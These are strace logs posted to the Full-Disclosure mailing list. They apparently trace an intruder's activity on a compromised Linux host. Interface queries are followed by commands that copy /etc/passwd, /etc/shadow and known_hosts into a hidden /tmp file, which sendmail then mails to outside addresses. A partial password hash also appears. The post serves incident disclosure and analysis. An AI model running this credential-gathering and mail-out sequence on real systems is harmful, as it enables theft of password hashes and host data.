read(6, "Inter-|   Receive               "..., 1024) = 569
close(6)                                = 0
munmap(0x40017000, 4096)                = 0
ioctl(5, 0x8913, 0xbffff1e0)            = 0
ioctl(5, 0x8927, 0xbffff1e0)            = 0
ioctl(5, 0x891d, 0xbffff1e0)            = 0
ioctl(5, 0x8921, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8942, 0xbffff1e0)            = 0
ioctl(5, 0x8915, 0xbffff1e0)            = -1 EADDRNOTAVAIL (Cannot assign requested address)
open("/usr/lib/gconv/gconv-modules.cache", O_RDONLY) = 6
fstat64(6, {st_mode=S_IFREG|0644, st_size=21040, ...}) = 0
mmap2(NULL, 21040, PROT_READ, MAP_SHARED, 6, 0) = 0x40017000
close(6)                                = 0
fstat64(1, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001d000
open("/proc/net/if_inet6", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/proc/net/dev", O_RDONLY)         = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001e000
read(6, "Inter-|   Receive               "..., 1024) = 569
close(6)                                = 0
munmap(0x4001e000, 4096)                = 0
ioctl(5, 0x8913, 0xbffff1e0)            = 0
ioctl(5, 0x8927, 0xbffff1e0)            = 0
ioctl(5, 0x891d, 0xbffff1e0)            = 0
ioctl(5, 0x8921, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8942, 0xbffff1e0)            = 0
ioctl(5, 0x8915, 0xbffff1e0)            = 0
ioctl(5, 0x8917, 0xbffff1e0)            = 0
ioctl(5, 0x8919, 0xbffff1e0)            = 0
ioctl(5, 0x891b, 0xbffff1e0)            = 0
open("/proc/net/if_inet6", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/proc/net/dev", O_RDONLY)         = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001e000
read(6, "Inter-|   Receive               "..., 1024) = 569
close(6)                                = 0
munmap(0x4001e000, 4096)                = 0
ioctl(5, 0x8913, 0xbffff1e0)            = 0
ioctl(5, 0x8927, 0xbffff1e0)            = 0
ioctl(5, 0x891d, 0xbffff1e0)            = 0
ioctl(5, 0x8921, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8970, 0xbffff1e0)            = 0
ioctl(5, 0x8942, 0xbffff1e0)            = 0
ioctl(5, 0x8915, 0xbffff1e0)            = 0
ioctl(5, 0x8917, 0xbffff1e0)            = 0
ioctl(5, 0x8919, 0xbffff1e0)            = 0
ioctl(5, 0x891b, 0xbffff1e0)            = 0
open("/proc/net/if_inet6", O_RDONLY)    = -1 ENOENT (No such file or directory)
close(5)                                = 0
write(1, "eth0      Link encap:Ethernet  H"..., 1234) = 1234
munmap(0x4001d000, 4096)                = 0
exit_group(0)                           = ?
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1065
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/tmp/.tmp", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
dup2(4, 1)                              = 1
close(4)                                = 0
execve("/bin/cat", ["cat", "/etc/passwd", "/etc/shadow", "/root/.ssh/known_hosts"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...})  = 0
brk(0)                                  = 0x804c4a8
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
brk(0)                                  = 0x804c4a8
brk(0x804d4a8)                          = 0x804d4a8
brk(0)                                  = 0x804d4a8
brk(0x804e000)                          = 0x804e000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4)                                = 0
fstat64(1, {st_mode=S_IFREG|0644, st_size=1234, ...}) = 0
open("/etc/passwd", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=1391, ...}) = 0
read(4, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1391
write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 1391) = 1391
read(4, "", 4096)                       = 0
close(4)                                = 0
open("/etc/shadow", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0400, st_size=1047, ...}) = 0
read(4, "root:$1$n0xS10QY$U9Vb/IkGFHKgaxj"..., 4096) = 1047
write(1, "root:$1$n0xS10QY$U9Vb/IkGFHKgaxj"..., 1047) = 1047
read(4, "", 4096)                       = 0
close(4)                                = 0
open("/root/.ssh/known_hosts", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=1541, ...}) = 0
read(4, "10.1.10.191 ssh-rsa [REDACTED KEY STUFF]"..., 4096) = 1541
write(1, "10.1.10.191 ssh-rsa [REDACTED KEY STUFF]"..., 1541) = 1541
read(4, "", 4096)                       = 0
close(4)                                = 0
close(1)                                = 0
exit_group(0)                           = ?
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1066
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/tmp/.tmp", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
dup2(4, 1)                              = 1
close(4)                                = 0
execve("/usr/bin/find", ["find", "/home", "-name", "known_hosts", "-exec", "cat", "{}"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...})  = 0
brk(0)                                  = 0x8054414
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
brk(0)                                  = 0x8054414
brk(0x8055414)                          = 0x8055414
brk(0)                                  = 0x8055414
brk(0x8056000)                          = 0x8056000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4)                                = 0
time(NULL)                              = 1063931038
open("/usr/share/locale/locale.alias", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=2601, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(4, "# Locale name alias data base.\n#"..., 4096) = 2601
read(4, "", 4096)                       = 0
close(4)                                = 0
munmap(0x40017000, 4096)                = 0
open("/usr/share/locale/en_US.UTF-8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en_US.utf8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en_US/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en.UTF-8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en.utf8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
write(2, "find: ", 6)                   = 6
write(2, "missing argument to `-exec\'", 27) = 27
write(2, "\n", 1)                       = 1
exit_group(1)                           = ?
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1067
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
close(4) = 0
dup2(5, 1) = 1
close(5) = 0
stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0
access("/bin/cat", X_OK) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
execve("/bin/cat", ["cat", "/tmp/.tmp"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...}) = 0
brk(0)                                  = 0x804c4a8
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
brk(0)                                  = 0x804c4a8
brk(0x804d4a8)                          = 0x804d4a8
brk(0)                                  = 0x804d4a8
brk(0x804e000)                          = 0x804e000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4)                                = 0
fstat64(1, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
open("/tmp/.tmp", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=5213, ...}) = 0
read(4, "eth0      Link encap:Ethernet  H"..., 4096) = 4096
write(1, "eth0      Link encap:Ethernet  H"..., 4096) = 4096
read(4, "28HbRLshEW8T3dU=\n10.1.10.174 ssh"..., 4096) = 1117
write(1, "28HbRLshEW8T3dU=\n10.1.10.174 ssh"..., 1117
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1068
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
dup2(4, 0)       = 0
close(4)      = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
execve("/usr/sbin/sendmail", ["/usr/sbin/sendmail", "-f", "ownage@....de", "m0nkeyhack@...ermarkt.de"], [/* 19 vars */]
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030919/6cf52881/attachment.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ